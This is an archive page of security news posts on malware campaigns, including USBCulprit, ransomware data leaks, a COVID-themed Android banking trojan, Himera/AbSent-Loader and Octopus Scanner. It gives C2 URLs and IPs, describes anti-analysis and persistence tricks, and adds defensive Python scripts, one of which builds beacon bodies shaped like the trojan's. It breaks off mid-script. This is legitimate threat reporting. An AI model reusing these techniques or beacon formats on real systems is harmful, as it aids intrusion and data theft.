Category Archives: Malware

Cycldek APT targets Air-Gapped systems using the USBCulprit Tool

A Chinese threat actor tracked as Cycldek (aka Goblin Panda, or Conimes) has developed a new tool to steal information from air-gapped systems.

Security experts from Kaspersky Lab reported that the Chinese threat actor tracked as Cycldek (aka Goblin Panda, or Conimes) has developed a new tool to steal information from air-gapped systems.

The Cycldek group was first spotted in September 2013. In past campaigns it mainly targeted entities in Southeast Asia using different malware variants, such as PlugX and HttpTunnel.

In 2014, experts noticed an intensification of the group’s activity; it appeared interested in the dispute over the South China Sea.

GOBLIN PANDA was focused on Vietnam; most of its targets were in the defense, energy, and government sectors.

In 2018, the cyberespionage group targeted Vietnam once again with a spear-phishing campaign that used weaponized documents featuring Vietnamese-language lures and themes.

The group’s arsenal includes multiple tools for information stealing and lateral movement, some of them previously unreported.

“One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.” reads the data published by Kaspersky.

Since 2017, the group has been observed launching attacks using RTF lure documents with political content related to Vietnam; the documents dropped a variant of a malicious program named NewCore RAT.

While analyzing NewCore, Kaspersky spotted two different variants, named BlueCore and RedCore, centered around two clusters of activity. The researchers found similarities in both the code and the infrastructure of the two variants, but also features exclusive to RedCore.

“Perhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters.” continues the report. “The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.”

Experts speculate that each cluster of activity had a different geographical focus: the operators behind the BlueCore cluster focused on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster initially targeted Vietnam and, by the end of 2018, Laos.

Both BlueCore and RedCore downloaded additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems.

Among the newly revealed tools, the most notable is USBCulprit, which relies on USB media to exfiltrate victim data, likely because the Cycldek group designed it to reach air-gapped networks or relies on physical presence for the same purpose.

Once USBCulprit is loaded into memory and executed, it operates in three phases:

  • it prepares the environment for its own execution;
  • it intercepts the connection of new media and verifies that it corresponds to a removable drive;
  • it performs data exfiltration and lateral movement through the drive.

USBCulprit scans multiple paths, collects documents with specific extensions (*.pdf, *.doc, *.wps, *.docx, *.ppt, *.xls, *.xlsx, *.pptx, *.rtf), and exports them to a connected removable drive.

The malware copies itself selectively to certain removable drives, only when a particular file is present on them, which suggests it is meant to spread laterally to other systems when the infected USB drive is inserted.

Kaspersky’s telemetry revealed that USBCulprit was first spotted in the wild in 2014, while the latest samples were detected in 2019.

“Cycldek is an example of an actor that has broader capability than publicly perceived.” Kaspersky concluded. “While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.”
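As an added illustration (not code from Kaspersky or from the USBCulprit sample), the following Python script does the defender’s side of the collection logic described above: given the mount point of a suspect removable drive, it inventories files matching USBCulprit’s target extension list, flags executables sitting next to them, and looks for bursts of documents written within seconds of one another, which is what an automated collector leaves behind and a person saving files by hand does not. The burst window, the “documents plus executable” heuristic and the sample drive it builds in a temporary directory are my own constructions for the demonstration.

```python
import os
import tempfile
import time
from collections import Counter

# Extension set USBCulprit collects, as listed in the Kaspersky write-up.
TARGET_EXTS = {".pdf", ".doc", ".docx", ".wps", ".ppt", ".pptx", ".xls", ".xlsx", ".rtf"}
# Executable types worth flagging next to the documents (a self-copy would be one of these).
EXEC_EXTS = {".exe", ".dll", ".scr", ".com"}


def inventory(drive_root):
    """Walk a mounted drive and return (documents, executables) as (path, mtime) lists."""
    docs, execs = [], []
    for dirpath, _, filenames in os.walk(drive_root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            try:
                mtime = os.stat(path).st_mtime
            except OSError:
                continue  # unreadable entry; skip it rather than abort the triage
            if ext in TARGET_EXTS:
                docs.append((path, mtime))
            elif ext in EXEC_EXTS:
                execs.append((path, mtime))
    return docs, execs


def copy_bursts(docs, window_s=60, min_files=5):
    """Cluster document mtimes that sit within `window_s` of their neighbour.

    Returns (first_mtime, last_mtime, count) for every cluster of at least
    `min_files` documents. The window is an assumption to tune per case.
    """
    times = sorted(m for _, m in docs)
    clusters, current = [], []
    for t in times:
        if current and t - current[-1] > window_s:
            clusters.append(current)
            current = []
        current.append(t)
    if current:
        clusters.append(current)
    return [(c[0], c[-1], len(c)) for c in clusters if len(c) >= min_files]


def triage(drive_root):
    """Summarise a suspect removable drive; `suspicious` is a heuristic, not a verdict."""
    docs, execs = inventory(drive_root)
    bursts = copy_bursts(docs)
    return {
        "documents": len(docs),
        "by_extension": dict(Counter(os.path.splitext(p)[1].lower() for p, _ in docs)),
        "executables": sorted(p for p, _ in execs),
        "bursts": bursts,
        # Bulk-copied documents plus an executable on the same stick matches the
        # exfiltration-plus-self-copy pattern described for USBCulprit.
        "suspicious": bool(bursts) and bool(execs),
    }


def build_sample_drive():
    """Constructed test data (not from the report): six documents written within
    seconds of each other, one old PDF, and one executable dropped beside them."""
    root = tempfile.mkdtemp(prefix="usb_triage_")
    base = time.time() - 86400
    for i in range(6):
        path = os.path.join(root, "Docs", f"report{i}.docx")
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "wb").close()
        os.utime(path, (base + i, base + i))
    old = os.path.join(root, "old.pdf")
    open(old, "wb").close()
    os.utime(old, (base - 100000, base - 100000))
    open(os.path.join(root, "setup.exe"), "wb").close()
    return root


if __name__ == "__main__":
    print(triage(build_sample_drive()))
```

Point the script at the real mount point (for example /media/usb or E:\) instead of the constructed sample; on a drive that has been written to by a collector, the bursts list is usually the quickest lead, because the timestamps survive even when file names look ordinary.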

Pierluigi Paganini

(SecurityAffairs – USBCulprit, cybersecurity)

The post Cycldek APT targets Air-Gapped systems using the USBCulprit Tool appeared first on Security Affairs.

U.S. Nuclear Contractor Hit with Maze Ransomware, Data Leaked

Westech International provides maintenance for the Minuteman III nuclear-missile program and runs programs for multiple branches of the military.

Sodinokibi ransomware gang launches auction site to sell stolen data

REvil/Sodinokibi ransomware operators have launched an auction site to sell data stolen from victims that chose not to pay the ransom.

Sodinokibi ransomware operators are very active in this period: a few days after leaking the files allegedly stolen from the UK power grid middleman Elexon, the gang announced the launch of an auction site to sell data stolen from victims that chose not to pay the ransom.

The Sodinokibi operators have launched an eBay-like auction site where they plan to sell data stolen from their victims.

Recently the Sodinokibi ransomware group claimed to have stolen gigabytes of legal documents from the entertainment and law firm Grubman Shire Meiselas & Sacks (GSMLaw), which has dozens of international stars and celebrities among its clients.

The list of clients of the law firm includes famous artists like Chris Brown, Madonna, Lady Gaga, Nicki Minaj, Elton John, Timbaland, Robert De Niro, Usher, and U2.

The hackers now plan to put Madonna’s legal documents up for auction.

The Sodinokibi operators use exploits to compromise the target’s network and infect as many computers as possible.

In May 2019, threat actors were observed exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations. In June 2019, the ransomware hit several managed service providers; in August, the same malware infected the company behind the DDS Safe solution used by hundreds of dental offices, and at least 23 Texas local governments as the result of a coordinated attack.

The Sodinokibi gang also operates a leak site on the dark web where it shares samples of stolen files to pressure victims.

The group has now implemented the new “auction” feature; the first auction is for documents stolen from a Canadian agricultural company that was hacked in May and refused to pay the ransom.

The starting bid is $50,000, payable in the Monero cryptocurrency.

(Image: Sodinokibi/REvil auction listing. Source: BleepingComputer)

The gang also threatened to auction Madonna’s private legal documents stolen from Grubman Shire Meiselas & Sacks (GSMLaw).

The REvil gang published the message “remember Madonna and other people,” suggesting that the files of the music star will be available for auction very soon.

Sodinokibi isn’t the only ransomware gang threatening to publish victims’ data to force them to pay the ransom; others include DoppelPaymer, Maze, Nefilim, Nemty, RagnarLocker, and NetWalker.

Pierluigi Paganini

(SecurityAffairs – ransomware, cybersecurity)

The post Sodinokibi ransomware gang launches auction site to sell stolen data appeared first on Security Affairs.

Octopus Scanner Sinks Tentacles into GitHub Repositories

At least 26 different open-source code repositories were found to be infected with an unusual attack on the open-source software supply chain.

Sodinokibi ransomware operators leak files stolen from Elexon electrical middleman

The REvil/Sodinokibi ransomware operators have leaked the files allegedly stolen from the UK power grid middleman Elexon.

In May, Elexon, a middleman in the UK power grid network, was the victim of a cyber attack; its systems were infected with the Sodinokibi ransomware.

The incident affected only the internal IT network, including the company’s email server and employee laptops.

“Hackers have targeted a critical part of the UK’s power network, locking staff out of its systems and leaving them unable to send or receive emails.” reads a post published by The Telegraph.

“Elexon – a key player in the energy market between power station operators and firms that supply households and businesses – said in a statement that its internal systems and company laptops had been affected by the cyberattack. It declined to give further details.”

The company manages electricity supply and demand and distributes the power around the network according to the demand.

“We are advising you today that ELEXON’s internal IT systems have been impacted by a cyber attack. BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only.” reads a post published by the company on its website. “We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails.”

The company took down the email server in response to the attack; according to Elexon, the systems used to manage the UK’s electricity transit were not impacted.

The company published a second message announcing that it had discovered the root cause of the incident and was working to restore the internal network and employee laptops. Elexon also added that the BSC Central Systems (and their data) and EMR were not impacted and were continuing to work as normal.

Two weeks later, Sodinokibi operators published 1,280 files allegedly stolen from the company on their leak site. The files include passports of Elexon staff members and an apparent business insurance application form.

Although the company did not reveal details of the attack, security firm Bad Packets reported that Elexon had been running an outdated version of Pulse Secure VPN server; if confirmed, threat actors could have exploited it to access the internal network.

Elexon did not pay the ransom and restored operations from backups; for this reason, the Sodinokibi operators decided to leak the stolen files.

Recently the Sodinokibi ransomware group claimed to have stolen gigabytes of legal documents from the entertainment and law firm Grubman Shire Meiselas & Sacks (GSMLaw), which has dozens of international stars and celebrities among its clients.

The list of clients of the law firm includes famous artists like Chris Brown, Madonna, Lady Gaga, Nicki Minaj, Elton John, Timbaland, Robert De Niro, Usher, and U2.

Sodinokibi isn’t the only ransomware gang threatening to publish victims’ data to force them to pay the ransom; others include DoppelPaymer, Maze, Nefilim, Nemty, RagnarLocker, and NetWalker.

Pierluigi Paganini

(SecurityAffairs – Sodinokibi, cybersecurity)

The post Sodinokibi ransomware operators leak files stolen from Elexon electrical middleman appeared first on Security Affairs.

New propagation module makes Trickbot more stealthy

Trickbot infections of Domain Controller (DC) servers have become more difficult to detect due to a new propagation module that makes the malware run from memory, Palo Alto Networks researchers have found. That also means that the malware infection can’t survive a shutdown or reboot of the system, but the stealth vs persistence tradeoff is likely to work in the attackers’ favor since servers are rarely shut down or rebooted. Trickbot’s evolution: Trickbot started as … More

The post New propagation module makes Trickbot more stealthy appeared first on Help Net Security.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications. Remote work and secure access concerns When asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID-19-themed attacks since February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign targeting users of the Italian National Institute for Social Security (INPS). Like a previous campaign observed in early April, threat actors set up a fake INPS site (“inps-it[.]top”) used to trick victims into downloading a malicious app.

“A new phishing campaign against INPS users, similar to the previous one of April 6, 2020, has been detected in the past few hours by our research and analysis center for phishing campaigns.” reads the post published by D3Lab.

“The fraudulent activity is carried out through a web domain created ad hoc with similarities, in the name, to the official one of the national social security institution, with the intent to deliver malware to users interested in receiving the Covid-19 allowance allocated by the Italian state.”

(Image: the fake INPS site used in the COVID-19 campaign)

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will grant to citizens meeting specific requirements.

Citizens have to request the Covid-19 indemnity from the government through the INPS portal; for this reason, threat actors set up a fake INPS site asking people to download a supposed “application for the new COVID-19 indemnity” which actually serves a malicious APK for Android devices.

The malicious APK, named “acrobatreader.apk,” is a banking trojan (Trojan-Banker) able to monitor the actions performed by the user.

The malware asks users to enable the accessibility service in order to abuse its legitimate functions and gain wider access to the system APIs and to other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to the C2 through the following URL, hxxp://greedyduck[.]top/gate[.]php, passing two parameters:

  • “Action”: with botcheck or injcheck values;
  • “Data”: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.
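The beacon format quoted above (an Action value of botcheck or injcheck and an RC4-encrypted Data field) can be reproduced and decoded in a few lines of Python. The block below is an added example, not code from the sample or from CERT-AGID: it implements RC4 as published, builds a beacon body of the described shape, and decrypts a captured one. The hex encoding of the ciphertext, the JSON payload and the key demo-key are assumptions for the demonstration; in a real case the key would have to be recovered from the APK.

```python
import binascii
import json
from urllib.parse import parse_qs, urlencode

C2_PATH = "/gate.php"                     # resource named in the CERT-AGID description
KNOWN_ACTIONS = ("botcheck", "injcheck")  # the two Action values the advisory lists


def rc4(key, data):
    """Plain RC4 (key scheduling + PRGA). Encryption and decryption are the same call.
    rc4(b"Key", b"Plaintext").hex() gives bbf316e8d940af0ad3, the published test vector."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_beacon(action, fields, key):
    """Construct a beacon body of the described shape: action plus RC4-encrypted data.
    Hex encoding of the ciphertext and a JSON payload are assumptions for this demo."""
    plain = json.dumps(fields, separators=(",", ":")).encode()
    return urlencode({"action": action, "data": rc4(key, plain).hex()})


def parse_beacon(body):
    """Return (action, ciphertext) if the POST body matches the beacon shape, else None."""
    try:
        params = parse_qs(body, strict_parsing=True)
    except ValueError:
        return None
    action = params.get("action", [None])[0]
    data = params.get("data", [None])[0]
    if action not in KNOWN_ACTIONS or data is None:
        return None
    try:
        return action, binascii.unhexlify(data)
    except (binascii.Error, ValueError):
        return None


def decode_beacon(body, key):
    """Decrypt a captured beacon with a key recovered from the APK (assumed known here)."""
    parsed = parse_beacon(body)
    if parsed is None:
        return None
    action, blob = parsed
    return {"action": action, "data": json.loads(rc4(key, blob).decode())}


DEMO_KEY = b"demo-key"  # constructed; the real sample's key is not on the page


def demo():
    """Round-trip a constructed botcheck beacon."""
    body = build_beacon("botcheck", {"id": "device-01", "os": "Android 9"}, DEMO_KEY)
    return body, decode_beacon(body, DEMO_KEY)


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

RC4 is a symmetric stream cipher, so the same function encrypts and decrypts; with a static key embedded in the app, recovering that one key lets an analyst decrypt every beacon a device ever sent, which is why the action/data split plus RC4 offers the operators little real protection against traffic analysis.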

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post A new COVID-19-themed campaign targets Italian users appeared first on Security Affairs.

NetWalker ransomware gang threatens to release Michigan State University files

Michigan State University is the latest victim of the NetWalker ransomware; the attackers threaten to leak stolen files if it does not pay the ransom within seven days.

Michigan State University has been hit by the NetWalker ransomware gang, whose operators are threatening to leak stolen files if the university does not pay the ransom within seven days.

At the time of writing, the ransom demand had not been disclosed.

Even if MSU restores from backups, the NetWalker ransomware gang will leak the stolen documents on its dark web leak site.

As proof of the attack, NetWalker ransomware operators have shared five images on the leak site.

“These include two images showing a directory structure allegedly from the university’s network, a passport scan for a student, and two scans of Michigan State financial documents.” reported ZDNet.

(Image: NetWalker leak site entry for Michigan State University. Source: ZDNet)

The NetWalker group is very active in this period; its victims include the shipping giant Toll. Researchers also identified a new Coronavirus-themed phishing campaign that aims at delivering the NetWalker ransomware.

The university did not reveal the extent of the attack. Students and employees are still working from home due to the COVID-19 outbreak, and the incident may not affect e-learning activity.

NetWalker isn’t the only ransomware gang threatening to publish victims’ data to force them to pay the ransom; others include DoppelPaymer, Maze, Nefilim, Nemty, RagnarLocker, and REvil.

Pierluigi Paganini

(SecurityAffairs – Michigan State University, hacking)

The post NetWalker ransomware gang threatens to release Michigan State University files appeared first on Security Affairs.

Threat Roundup for May 22 to May 29

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 22 and May 29. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

Read More



20200529-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 22 to May 29 appeared first on Cisco Blogs.

Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  


During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed to many companies under our protective umbrella. These messages leveraged FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemic. The emails were weaponized with two versatile cyber-criminal tools: Himera and AbSent-Loader.

Figure1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware onto the victim’s machine. Sometimes a loader also assumes “stealer” behavior, opportunistically gathering sensitive information even though that is not its stated purpose; AbSent-Loader, despite its name, behaves this way. The stolen-information market is lucrative for cyber criminals: information gathered from infected systems is constantly sold in the underground, typically acquired by other, more structured criminal organizations or by business competitors.

Technical Analysis  

The sample used in this campaign first uses a Word document that carries an executable; that executable then drops another executable and renames it to evade controls. The following picture shows the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave carried a .doc attachment. Its static information follows:

Threat: Himera Loader dropper
Size: 95.4 KB (97,745 bytes)
Filetype: Microsoft Word document

Table 1: Static information about the Malicious document

The interesting feature of this document is that it does not leverage any macro or exploit: it contains the entire executable as an embedded object, and the user is led to double-click the malicious icon representing the executable.

Once clicked, the document executes a malicious file named HimeraLoader.exe.

Threat: Second stage dropper
Size: 143 KB (146,944 bytes)
File Info: Microsoft Visual C++ 8

Table 2: Static information about the HimeraLoader executable

Inspecting the HimeraLoader.exe execution trace, we noticed a characteristic mutex (or Mutant) created during the initial loading of the malicious code: “HimeraLoader v1.6”.

Figure 3: Himera Loader Mutex

Also, the sample performs some classic anti-analysis tricks using Windows APIs such as IsDebuggerPresent, IsProcessorFeaturePresent and GetStartupInfoW; execution takes a different path through the program’s flow if a debugger is present. GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created: it takes as its parameter a pointer to a STARTUPINFO structure that receives the startup information and does not return a value.

Figure 4: Relevant strings of the Loader

Once Himera Loader passes all its anti-analysis checks, it fetches another binary from hxxp://195[.]2[.]92[.]151/ad/da/drop/smss[.]exe. The remote server is operated by Hosting Technologies LLC, a company running a Russian hosting service brand.

The AbSent-Loader 

The file downloaded from the drop URL has the following static information:

Threat: AbSent-Loader payload
Size: 0.99 MB (1,047,040 bytes)
File Info: Microsoft Visual C++ 8

Table 3: Static information about the AbsentLoader Payload

When smss.exe is executed, it copies itself to a new file, winsvchost.exe, in the %TEMP% path and creates a scheduled task to maintain persistence across reboots.

Figure 5: Evidence of the Scheduled Task

Moreover, the malware adopts some interesting anti-debug techniques, such as the GetTickCount timing check, similar to the one described in one of our previous reports: GetTickCount is called once before and once after a “call eax” instruction, the first result is subtracted from the second, and the difference left in the EAX register tells the malware whether execution took longer than it should, as it does under a debugger.

Figure 6: GetTickCount anti-debug Technique

The malware then establishes a TCP connection every 15 minutes to the same remote host operated by Hosting Technologies LLC, this time sending HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload
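A fixed 15-minute POST to the same gate.php resource is the kind of pattern a proxy log gives away even when the payload itself is opaque. The Python below is an added example, not part of the ZLab analysis: it parses a constructed proxy log (the host and path are the ones named above; the timestamps and the browsing lines are made up), groups requests by flow, and flags flows whose inter-request gaps have a near-zero coefficient of variation. The thresholds (at least four hits, cv of at most 0.1) are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log sample (not from the report): "timestamp src dst method path".
# The C2 host and path are the ones named in the analysis; the timings and the
# ordinary browsing lines are made up to mimic a 15-minute beacon in real traffic.
SAMPLE_LOG = """\
2020-05-29T08:00:02Z 10.1.2.33 195.2.92.151 POST /ad/da/gate.php
2020-05-29T08:03:10Z 10.1.2.33 93.184.216.34 GET /index.html
2020-05-29T08:04:55Z 10.1.2.33 93.184.216.34 GET /index.html
2020-05-29T08:15:03Z 10.1.2.33 195.2.92.151 POST /ad/da/gate.php
2020-05-29T08:30:01Z 10.1.2.33 195.2.92.151 POST /ad/da/gate.php
2020-05-29T08:31:40Z 10.1.2.33 93.184.216.34 GET /index.html
2020-05-29T08:45:04Z 10.1.2.33 195.2.92.151 POST /ad/da/gate.php
2020-05-29T09:00:02Z 10.1.2.33 195.2.92.151 POST /ad/da/gate.php
2020-05-29T09:10:05Z 10.1.2.33 93.184.216.34 GET /index.html
"""


def parse_log(text):
    """Parse the five-column constructed format into (timestamp, src, dst, method, path)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, method, path = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, method, path))
    return events


def find_beacons(events, min_hits=4, max_cv=0.1):
    """Flag flows whose inter-request gaps are nearly constant.

    cv = population stdev / mean of the gaps. A scheduled beacon has cv close
    to 0; a person re-visiting the same URL does not. Thresholds are tuning
    knobs, not truths: loaders that add random sleep raise the cv on purpose.
    """
    by_flow = defaultdict(list)
    for ts, src, dst, method, path in events:
        by_flow[(src, dst, method, path)].append(ts)
    findings = []
    for flow, stamps in by_flow.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({"flow": flow, "hits": len(stamps),
                             "mean_interval_s": round(avg), "cv": round(cv, 4)})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the constructed log the POSTs to 195.2.92.151 come out with a mean interval of 900 seconds and a cv near 0.002, while the four visits to the web site, with gaps of minutes to half an hour, are rejected. A scheduled task firing on the quarter hour is the easy case; the same grouping still works with jittered implants if you widen max_cv and require more hits.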

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, also behaves like a bot: it lacks most modern advanced features but is sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow-up malware implants.


The attack we intercepted and described here is a clear example of the new threats emerging in cyberspace during these months: new criminal threat actors whose sole objective is to economically exploit the emotional reactions of people willing to keep the economic fabric alive and running to support the Covid19 response.

In this period cyberspace is getting riskier for companies and people: cyber criminality rose during the lockdowns, and these malicious actors are using every possible medium to make money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and enhance their cyber security perimeter to resist the new volumes and types of cyber attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub

GitHub has issued a security alert warning of a malware campaign that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub has issued a security alert warning of a piece of malware dubbed Octopus Scanner that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub’s security team discovered the malicious code in projects managed with the Apache NetBeans IDE (integrated development environment), a complete environment composed of editors, wizards, and templates that help users create applications in Java, PHP and many other languages.

On March 9, a security researcher informed GitHub about a set of GitHub-hosted repositories that were actively serving malware. The company immediately investigated the incident and discovered malware designed to enumerate and backdoor NetBeans projects, “and which uses the build process and its resulting artifacts to spread itself.”

What makes this case different from previous abuses of the platform is that the owners of the repositories were unaware that they were committing backdoored code into their repositories.

“GitHub’s Security Incident Response Team (SIRT) received its initial notification about a set of repositories serving malware-infected open source projects from security researcher JJ.” reads a post published by GitHub.

“This report was different. The owners of the repositories were completely unaware that they were committing backdoored code into their repositories.”

Octopus Scanner identifies NetBeans project files and embeds a malicious payload in both the project files and the build JAR files.

Below is a high-level description of the Octopus Scanner activity:

  • Identify the user’s NetBeans directory
  • Enumerate all projects in the NetBeans directory
  • Copy the malicious payload cache.dat to nbproject/cache.dat
  • Modify the nbproject/build-impl.xml file to make sure the malicious payload is executed every time the NetBeans project is built
  • If the malicious payload is an instance of Octopus Scanner itself, the newly built JAR file is also infected

(Image: NetBeans Octopus Scanner supply chain attack)

Experts uncovered 26 open source projects that were backdoored by the Octopus Scanner malware and were serving backdoored code.

The Octopus Scanner campaign is not recent; it has been going on for years. Experts reported that the oldest sample of the malware was uploaded to VirusTotal in August 2018.

Upon downloading any of the 26 projects, the malware would infect the user’s local computer: it scans the victim’s workstation for a local NetBeans IDE install and attempts to backdoor the developer’s other Java projects.

According to the experts, Octopus Scanner is a multiplatform malware, it runs on Windows, macOS, and Linux and downloads a remote access trojan (RAT).

“However, if it was found, the malware would proceed to backdoor NetBeans project builds through the following mechanisms:

  1. It makes sure that every time a project was built, any resulting JAR files got infected with a so-called dropper. A dropper is a mechanism that “drops” something to the filesystem to execute. When executed, the dropper payload ensured local system persistence and would subsequently spawn a Remote Administration Tool (RAT), which connects to a set of C2 servers.
  2. It tries to prevent any NEW project builds from replacing the infected one, to ensure that its malicious build artifacts remained in place.”

The ultimate goal of the campaign is to deliver the RAT on the machines of developers working on sensitive projects to steal sensitive information.
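As an added example, not GitHub’s tooling, the Python below audits a directory tree for NetBeans projects (identified by nbproject/project.xml) and checks the two indicators the write-up gives: a dropped nbproject/cache.dat and a modified nbproject/build-impl.xml. That a tampered build-impl.xml has to name cache.dat in order to run it is my assumption, as is the optional comparison against a known-good SHA-256 of the file; the tampered build file in the constructed sample tree is illustrative and is not the attackers’ actual modification.

```python
import hashlib
import os
import tempfile

# Indicators from the GitHub write-up: the payload lands in nbproject/cache.dat and
# nbproject/build-impl.xml is modified so the payload runs on every build.
PAYLOAD_NAME = "cache.dat"
BUILD_FILE = "build-impl.xml"


def find_netbeans_projects(root):
    """A NetBeans project is a directory holding nbproject/project.xml."""
    projects = []
    for dirpath, _, filenames in os.walk(root):
        if os.path.basename(dirpath) == "nbproject" and "project.xml" in filenames:
            projects.append(os.path.dirname(dirpath))
    return sorted(projects)


def baseline_hash(data):
    """SHA-256 hex digest, used for the optional known-good comparison."""
    return hashlib.sha256(data).hexdigest()


def audit_project(project_dir, known_good_sha256=None):
    """Return findings for one project; an empty list means nothing matched."""
    nb = os.path.join(project_dir, "nbproject")
    findings = []
    if os.path.exists(os.path.join(nb, PAYLOAD_NAME)):
        findings.append("nbproject/cache.dat present")
    build = os.path.join(nb, BUILD_FILE)
    if os.path.exists(build):
        with open(build, "rb") as fh:
            data = fh.read()
        # Assumption: to execute the dropped payload the modified build-impl.xml has to
        # name it; a build-impl.xml generated by NetBeans from project.xml does not.
        if PAYLOAD_NAME.encode() in data:
            findings.append("build-impl.xml references cache.dat")
        # Optional: compare against the hash of the file as last reviewed or committed.
        if known_good_sha256 and baseline_hash(data) != known_good_sha256:
            findings.append("build-impl.xml differs from the known-good baseline")
    return findings


def audit_tree(root, baselines=None):
    """Map every project under `root` to its findings. `baselines` maps project
    path to the known-good SHA-256 of its build-impl.xml, when available."""
    baselines = baselines or {}
    return {p: audit_project(p, baselines.get(p)) for p in find_netbeans_projects(root)}


# Constructed minimal build file in the style NetBeans generates (illustrative only).
CLEAN_BUILD_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!-- *** GENERATED FROM project.xml - DO NOT EDIT *** -->
<project name="demo-impl" default="default" basedir="..">
    <target name="-post-jar"/>
</project>
"""
# Constructed tampered variant: a post-jar step that runs the dropped payload. The
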